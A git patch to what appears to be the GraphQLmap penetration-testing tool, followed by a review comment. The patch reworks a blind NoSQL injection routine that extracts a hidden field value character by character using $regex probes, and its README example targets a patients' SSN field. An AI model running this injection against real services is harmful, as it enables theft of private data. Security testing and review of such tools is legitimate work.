From 6176bd3afc5cca548a9d0dce55a57d04b00be1e5 Mon Sep 17 00:00:00 2001
From: onSec-fr
Date: Wed, 22 Apr 2020 11:32:48 +0200
Subject: [PATCH] Update attacks.py

#Change : blind_nosql
#Benefits : It can find the full value without knowing its length + Avoid infinite loops.
-Removed the "data_size" parameter. Now it stops searching as soon as it no longer finds valid characters.
-Add : Ability to set a custom charset.
---
 README.md | 2 ++
 attacks.py | 22 +++++++++++++---------
 2 files changed, 15 insertions(+), 9 deletions(-)

diff --git a/README.md b/README.md
index 2942070..015e04d 100644
--- a/README.md
+++ b/README.md
@@ -134,7 +134,9 @@ Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function.
 GraphQLmap > nosqli
 Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
 Check > 5d089c51dcab2d0032fdd08d
+Charset > 0123456789abcdef-
 [+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
+GraphQLmap >
 ```
 ### SQL injection
diff --git a/attacks.py b/attacks.py
index d88a370..b3d80e2 100644
--- a/attacks.py
+++ b/attacks.py
@@ -159,24 +159,28 @@ def blind_mssql(url, method, headers):
 def blind_nosql(url, method, headers):
- # Query : {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
- # Check : "5d089c51dcab2d0032fdd08d"
-
+ # Query - include BLIND_PLACEHOLDER. e.g. {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
 query = input("Query > ")
+ # Check the input (known value) against the data found - e.g. 5d089c51dcab2d0032fdd08d
 check = input("Check > ")
+ # Charset to use - Default abcdefghijklmnopqrstuvwxyz1234567890
+ charset = input("Charset > ")
+ if(not charset):
+ charset = "abcdefghijklmnopqrstuvwxyz1234567890"
 data = ""
- data_size = 35
- charset = "0123456789abcdef-"
-
- while len(data) != data_size:
+ _break = False
+
+ while (_break == False):
+ old_data = data
 for c in charset:
 injected = query.replace("BLIND_PLACEHOLDER", data + c)
 r = requester(url, method, injected, headers)
 if check in r.text:
 data += c
- # display data and update the current line
 print("\r\033[92m[+] Data found:\033[0m {}".format(data), end='', flush=False)
-
+ # Stop if no character is found
+ if(old_data == data):
+ _break = True
 # force a line return to clear the screen after the data trick
 print("")
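Review bot: The new loop is driven by a `_break` flag tested as `while (_break == False):` and set under `if(old_data == data):`; the idiomatic form is `while True:` around the charset pass followed by `if old_data == data:` / `break`, which removes the `_break` variable and the redundant parentheses (the same applies to `if(not charset):`). The termination guarantee the commit message claims also depends on the user-supplied charset: each entry is spliced unescaped into the `$regex` and the surrounding JSON, so an entry that is a regex metacharacter or a quote can make every probe match and `old_data == data` is never reached; validating or escaping the charset before the loop would close that gap. `blind_nosql` still has no docstring; a short one stating that the value is recovered one character per matching probe and that the search stops once a full charset pass adds nothing would document the new contract. The hunk ends at the final `print("")`, so whether anything follows it in the function is not visible here.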